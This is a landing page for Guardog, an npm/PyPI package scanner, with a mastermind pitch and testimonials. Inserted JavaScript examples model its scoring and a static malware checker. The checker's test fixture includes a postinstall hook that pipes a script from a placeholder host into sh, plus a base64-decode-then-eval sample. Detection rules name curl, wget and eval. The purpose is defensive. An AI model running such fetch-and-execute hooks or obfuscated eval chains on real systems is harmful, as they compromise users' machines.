Guardog: Package Security Scanner

Scan before you install. Know before it's too late.

Think of it as free antivirus for your code dependencies. It scans every package for hidden malware and checks live vulnerability databases for newly discovered threats. Install once, run it before you install anything.

Works in: Claude Code (as a skill) and the terminal.

Install once. Scan anything.

01 Copy the install command

One line. Copy it from the box below.

02 Run it in your terminal

It clones Guardog, installs dependencies, drops the Claude Code skill in the right place, and walks you through adding a free VirusTotal key. Done in under a minute.

03 Type /guardog before you install

In Claude Code: /guardog express npm. In terminal: node ~/guardog/src/index.js analyze express npm. You get SILENT, WHINE, or BARK.

Think of it as

Free antivirus for your packages. Gets smarter every day.

Scans the files you download

When you run Guardog, it reads the actual package code sitting on your disk. It checks for credential harvesters, obfuscated scripts, crypto miners, reverse shells, and 25+ other malicious patterns. No sample or summary. The real files.

Checks the internet for new threats daily

A package that was clean last month may have a critical CVE discovered today. Guardog queries live vulnerability databases every time you run it, so you are always checking against the latest known threats. Not a snapshot. Live data.

Three verdicts. No ambiguity.

SILENT
Score under 50

Package passed all checks. Safe to install.

WHINE
Score 50-99

Suspicious signals found. Review before installing.

BARK
Score 100+

Dangerous. Do not install.

Want to learn how to do this?

Join the Business Automation Mastermind

A small, focused group of business owners who meet weekly to build real things, fast -- leaving more time to serve clients and be with the people you love.

Small group, capped at 15
We meet weekly
Idea to live site in one session

Real reactions from Cohort 1

What members said after their sessions.

Sophia, Session 4

We have like 55 signups for our masterclass and we've only launched maybe four days ago.

Jenny, Session 3

It took like 5 minutes! I just took the one which took me one year, and I said make an essence of that, and what would be the most interesting free webinar?

Alla, Session 3

It looks amazing, and everyone loves my website, and they can't believe that I've created it. I can't believe it myself.

SunDari, Session 1

I used to pay all these people; now I can do it myself.

Ronnie, Session 2

I already had a draft website and it created a link to my calendar, a link to my link tree, a hyperlink for my WhatsApp, all the same photos. This is like 90% of the way there to the kind of website that I want.

Alla, Session 4

I've been comparing myself to a bird who now has wings. I feel so free.

Sophia, Session 4

I was able to go in and create my full email marketing funnel. It took off so much of the work of creating the workflow.

Johanna, Session 1

I have particles floating in the background, a circle following my cursor, things glowing. I could not believe I built this in one session.

Ronnie, Session 1

It pulled in my calendar link, my WhatsApp, all my deck photos. This is 90% of the website I wanted. In 45 minutes.

Aaqib, Session 2

I got a functional contact form on the website using Resend. I managed to get that set up in like 20 minutes. So I'm pretty stoked.

Pina Maria, Session 4

I said change it and it changed my whole website in just one second. Everything worked, it was so easy.

Johanna, Session 4

I was so on fire and so motivated because so many pieces of the puzzle I've been working on for a long time are coming together.

Jasmine, Session 2

It was great. It's been something that I really want to do, so I'm super grateful. It's so easy and we can just keep building over time. It's epic.

Aaqib, Session 3

I did a whole target audience and persona building exercise. I can safely say that I feel addicted to Claude.

Marina, Session 3

It's really empowering to learn and to see, with all these different tools, what becomes possible.

SunDari, Session 4

Excited that I can just ask Claude anything and be guided and supported through it all.

Quincee, Session 4

The website's looking great. I did a brand photoshoot this past week and I feel like a brand new person digitally.

Alla, Session 2

I got my website online. Thank you so much, it was amazing.

Quincee, Session 4

I feel magnetic. I feel guided.

The Tool

Copy. Paste. Done.

In the Business Automation Mastermind, we run Guardog before installing anything new. One command in your terminal and it is ready to use in Claude Code and from the command line.

Terminal
git clone https://github.com/josephtandle/guardog.git ~/guardog && cd ~/guardog && ./install.sh

Requires Git and Node.js. The installer handles everything else, including the optional VirusTotal setup. View on GitHub for the manual install path.


What Guardog checks

Four scanning layers run on every package. VirusTotal is optional but recommended. Everything else works without any setup.

Google OSV

Queries the Open Source Vulnerabilities database maintained by Google. Covers npm, PyPI, and hundreds of other ecosystems. Returns known CVEs with severity ratings.

Severity scoring

Each CVE is scored: critical (+25), high (+15), medium (+5), low (+2). The scores stack into a total threat score that drives the final verdict.

No API key required

OSV is a free, open API. CVE lookups work out of the box on every scan, no account needed.
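A minimal model of the scoring arithmetic described above, combined with the SILENT / WHINE / BARK bands given earlier on the page. This is an added illustration, not Guardog's own code: the weights and bands are the ones the page states, while the CVE record shape, the function names and the handling of a CVE with no severity are assumptions.

```javascript
// Added example: a simplified model of the severity scoring and verdict
// bands described on the page. The weights (critical 25, high 15, medium 5,
// low 2) and the bands (<50 SILENT, 50-99 WHINE, 100+ BARK) come from the
// page; the record shape, function names and the treatment of CVEs with
// no severity are assumptions, not Guardog's real implementation.
const SEVERITY_WEIGHTS = { critical: 25, high: 15, medium: 5, low: 2 };

// Sum the per-CVE weights into a total threat score. A CVE whose severity
// is missing or unrecognised is counted at the "low" weight (assumption),
// so it still contributes instead of being silently dropped.
function threatScore(cves) {
  return cves.reduce((total, cve) => {
    const sev = String(cve.severity || '').toLowerCase();
    const weight = SEVERITY_WEIGHTS[sev] ?? SEVERITY_WEIGHTS.low;
    return total + weight;
  }, 0);
}

// Map a total score onto the three verdicts.
function verdict(score) {
  if (score >= 100) return 'BARK';
  if (score >= 50) return 'WHINE';
  return 'SILENT';
}

// Build the kind of summary a scan would report for one package.
function scanReport(packageName, cves) {
  const score = threatScore(cves);
  return { package: packageName, cves: cves.length, score, verdict: verdict(score) };
}

// Constructed sample input: five advisories with placeholder ids, shaped
// like a normalised OSV result. 25 + 25 + 15 + 5 + 2 = 72, which lands in
// the WHINE band; one more critical (97) would still be WHINE, and two
// more (122) would be BARK.
const SAMPLE_CVES = [
  { id: 'CVE-PLACEHOLDER-1', severity: 'critical' },
  { id: 'CVE-PLACEHOLDER-2', severity: 'CRITICAL' },
  { id: 'CVE-PLACEHOLDER-3', severity: 'high' },
  { id: 'CVE-PLACEHOLDER-4', severity: 'medium' },
  { id: 'CVE-PLACEHOLDER-5', severity: 'low' },
];

console.log(scanReport('example-package', SAMPLE_CVES));
```

Counting an unknown severity at the low weight is a choice made for this example; a real scanner could equally surface it as a separate warning so that a missing rating never pulls a package into SILENT by accident.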

npm registry

Checks download counts, package age, maintainer count, and metadata signals. A package with 12 downloads published 3 days ago scores very differently than lodash.

PyPI registry

Same reputation signals for Python packages. Age, downloads, maintainer history, and whether the project links to a real repository.

GitHub signals

Checks whether the package links to a real GitHub repo. Missing repo, zero stars, and brand-new accounts all add to the threat score.

Credential harvesting

Detects patterns that read environment variables, AWS keys, SSH files, or browser credential stores and send their contents out in network calls.

Obfuscation detection

Flags eval(), Function(), fromCharCode(), and base64-encoded execution chains. Legitimate packages have no reason to hide what they do.

Crypto miners

Detects mining library imports, CPU-pegging loops, and wallet address patterns embedded in install scripts.

Reverse shells

Matches patterns that open outbound sockets, spawn shell processes, and establish persistence on the host system.

Supply chain hooks

Scans postinstall, preinstall, and prepare scripts for suspicious network calls and file system writes outside the package directory.

Typosquat signals

Cross-references the package name against a list of popular packages. A name one character away from "express" or "react" is an immediate flag.
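The three file-level layers just described (obfuscation markers, lifecycle-hook inspection and typosquat distance) as one small static checker. This is an added illustration, not Guardog's own code: the rules, the popular-package list, the hypothetical package.json and the setup.js contents are all constructed for the example.

```javascript
// Added example: a small static checker in the spirit of the page's
// obfuscation, supply-chain-hook and typosquat layers. Every rule and
// sample below is an assumption made for illustration; none of it is
// Guardog's own implementation.

// npm lifecycle scripts that run automatically on install.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Markers of hidden execution, matching the constructs the page lists.
const OBFUSCATION_RULES = [
  { label: 'eval()', re: /\beval\s*\(/ },
  { label: 'Function() constructor', re: /\bFunction\s*\(/ },
  { label: 'String.fromCharCode()', re: /\bfromCharCode\s*\(/ },
  { label: 'base64 decoding', re: /Buffer\.from\([^)]*['"]base64['"]\)|\batob\s*\(/ },
];

// What to look for inside a lifecycle script: network access and shelling out.
const HOOK_RULES = [
  { label: 'network access', re: /\b(curl|wget)\b|https?:\/\// },
  { label: 'shell execution', re: /\|\s*(sh|bash)\b|\bnode\s+-e\b/ },
];

// Return the labels of every obfuscation rule that fires on a source file.
function checkObfuscation(source) {
  return OBFUSCATION_RULES.filter(r => r.re.test(source)).map(r => r.label);
}

// Inspect only the lifecycle scripts of a parsed package.json.
function checkLifecycleHooks(pkgJson) {
  const scripts = (pkgJson && pkgJson.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    for (const rule of HOOK_RULES) {
      if (rule.re.test(cmd)) findings.push(`${hook}: ${rule.label}`);
    }
  }
  return findings;
}

// Levenshtein distance: the number of single-character edits between two names.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const subst = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + subst);
    }
  }
  return dp[a.length][b.length];
}

// A name exactly one edit away from a popular package is the page's typosquat signal.
function typosquatMatch(name, popular) {
  return popular.find(p => p !== name && editDistance(name, p) === 1) || null;
}

// Run all three checks over a package and collect the findings.
function scanPackage(pkgJson, files, popular) {
  const findings = checkLifecycleHooks(pkgJson);
  for (const [path, source] of Object.entries(files)) {
    for (const label of checkObfuscation(source)) findings.push(`${path}: ${label}`);
  }
  const near = typosquatMatch(pkgJson.name, popular);
  if (near) findings.push(`name "${pkgJson.name}" is one edit from "${near}"`);
  return findings;
}

// Constructed sample: a short popular list (names taken from the page), a
// package.json with a postinstall hook, and a setup script that decodes a
// placeholder blob and evaluates it. example.invalid is a reserved test domain.
const POPULAR = ['express', 'react', 'lodash'];
const SAMPLE_PKG = {
  name: 'expres',
  version: '0.0.1',
  scripts: { postinstall: 'curl -s https://example.invalid/setup.sh | sh', test: 'node test.js' },
};
const SAMPLE_FILES = {
  'setup.js': [
    "const blob = 'PLACEHOLDER_BASE64';",
    "const code = Buffer.from(blob, 'base64').toString();",
    'eval(code);',
  ].join('\n'),
};

console.log(scanPackage(SAMPLE_PKG, SAMPLE_FILES, POPULAR));
```

On the constructed sample the checker reports five findings: two from the postinstall hook, two from setup.js, and the one-edit distance from "express". Only lifecycle scripts are inspected, so an ordinary test script is ignored; that keeps the hook layer focused on code that runs without the user asking for it.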

70+ antivirus engines

With a free VirusTotal API key, Guardog submits the package URL or file hash for scanning across 70+ AV engines simultaneously. Takes about 5 seconds.

Free tier is enough

4 requests per minute, 500 per day. More than sufficient for scanning packages before you install them. Signing up takes 2 minutes.

Works without it

CVE lookups, reputation checks, and pattern analysis all run without a key. VirusTotal adds a deeper malware layer on top. Recommended but not required.

/guardog command

After install, type /guardog followed by any package name in Claude Code. Guardog runs the scan and Claude interprets the results in plain English.

Three verdicts

SILENT means safe to install. WHINE means suspicious, review before installing. BARK means dangerous, do not install. No ambiguity.

Also works from terminal

node ~/guardog/src/index.js analyze lodash npm -- run it directly without Claude Code if you prefer.

P.S. Supply chain attacks through npm and PyPI have hit companies you have heard of. The packages look real. The names are close. The installs are silent. Guardog takes 3 seconds to run and costs nothing.